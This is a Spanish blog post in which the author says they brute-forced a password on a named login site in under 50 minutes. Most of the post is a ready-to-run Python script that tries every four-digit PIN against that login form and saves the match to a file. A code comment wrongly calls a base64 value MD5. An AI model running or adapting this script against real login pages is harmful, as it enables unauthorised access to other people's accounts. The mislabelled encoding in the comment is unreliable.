Python brute force

De -
Para acelerar el proceso de brute forcing utilicé el primer script en mi PC y el otro lo ejecuté en un servidor shell que tengo en el mundo exterior con Python instalado, por lo que en menos de 50 minutos la contraseña estaba en mis manos. 
import urllib
import urllib2
import md5
import random
import time
 
abc = "0123456789";
url = "http://aerolinea.vuelefeliz.com/login"
new_passwd = 0
 
for i1 in range(0, len(abc)):
        var0 = abc[i1]
        for i2 in range(0, len(abc)):
                var1 = abc[i2]
                for i3 in range(0, len(abc)):
                        var2 = abc[i3]
                        for i4 in range(0, len(abc)):
                                var3 = abc[i4]
                                passwd = var0 + var1 + var2 + var3
                                print "- Password: " + passwd
                                try:
                                        values={'Aer_Id':'MTYyMA==', #esto es el usuario cifrado con md5
                                        'Aer_Passwd':md5.new(passwd).digest().encode("hex")} #password tambien cifrada con md5
                                        print "- Aer_Passwd: " + md5.new(passwd).digest().encode("hex")
 
                                        data = urllib.urlencode(values)
                                        req = urllib2.Request(url, data)
                                        response = urllib2.urlopen(req)
 
                                        html = response.read()
                                        if(html.find("Login was unsuccessful") > 0):
                                                print "Nothing of nothing...\n"
                                        else:
                                                #si encuentra la password la guarda en un archivo llamado passwd_found
                                                print "Password found!\n"
                                                arch = open("passwd_found", "w")
                                                arch.write(passwd)
                                                arch.close()
                                                exit()
                                except:
                                        print "Error...\n"

Comentarios

Publicar un comentario

Entradas populares de este blog

Netcat & Wireshark

De -
Imagen
Netcat Esta es una herramienta de red que permite a través de comandos y con una simple abrir puertos TCP/UDP funcionando como servidor (-l), o bien conectarnos a un determinado servidor en un puerto especifico (Cliente), por medio del netcat podemos obtener informacion de banners de servicios, por ejemplo supongamos que realizamos un escaneo con Nmap a un determinado HOST y descubrimos que el puerto 3306 se encuentra abierto, podemos intenar realizar una conexion a ese puerto utlizando el netcat y asi obtener mas informacion sobre determinado servicio, o bien obtener una conexion exitosa a ese puerto. Esta herramienta fue desarrollada por Hobbit en el año 96 y liberada bajo GNU para unix, posteriormente se migro a otras plataformas como Windows y Mac OS X. Se realizo el siguiente video con el fin de mostrar el uso de esta herramienta, en el mismo se realizan conexiones cliente servidor entre windows y backtrack sniffeando los paquetes con wireshark, se muestra como obtener una s
Leer más
De -
GOOGLE DORKS En general podriamos definir lo que es  Google  Dorks como búsquedas avanzadas mediante el uso de operadores complejos que Google  pone a nuestra disposición, unos de estos operadores son los llamados OPERADORES BOOLEANOS, que son los que Google utiliza   para realizar búsquedas combinadas de varios términos. Esos operadores son una serie de símbolos que Google reconoce y modifican la búsqueda realizada. Además de los operadores booleanos, existen otra serie de palabras clave que se pueden utilizar para  realizar "búsquedas diferentes" con Google El objetivo principal del uso de los Dorks de Google es que mediante el uso de estas facilidades podemos ahorrarnos el trabajo de buscar vulnerabilidades y dejar que google nos muestra las que encontró y tiene indexadas .  "Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de l
Leer más

Día Internacional de la Seguridad Informática, 30 de noviembre 2013, Nicoya

De -
EL GRUPO DE SEGURIDAD INFORMATICA DE COSTA RICA, VA A ASISTIR, LOS QUE QUIEREN IR MANDEN UN MSJ A JAMES JARA PARA HACER ESPACIO EN LA BUSETA Día Internacional de la Seguridad Informática, 30 de noviembre 2013, Nicoya Universidad Nacional, Sede Regional Chorotega Saturday, November 30, 2013 from 9:00 AM to 5:00 PM (CST) Nicoya, Costa Rica Universidad Nacional Sede Regional Chorotega Día Internacional de la Seguridad Informática, 30 de Noviembre del 2013. Lugar: Campus Nicoya, UNA. Inicio de actividades: 9:00 am Fin de actividades: 4:30 p.m Coordinador: Edgar A. Vega Briceño, Académico Registro online:  https://www.eventbrite.com/event/8946895405 Desde 1998, la ACM Association for Computing Machinery ha designado el último día de noviembre como el Día Internacional de la Seguridad Informática, con el objetivo primordial de crear conciencia sobre esta práctica que debe ser implementada por los usuarios en un mundo inundado de dispositivos tecnológicos. L
Leer más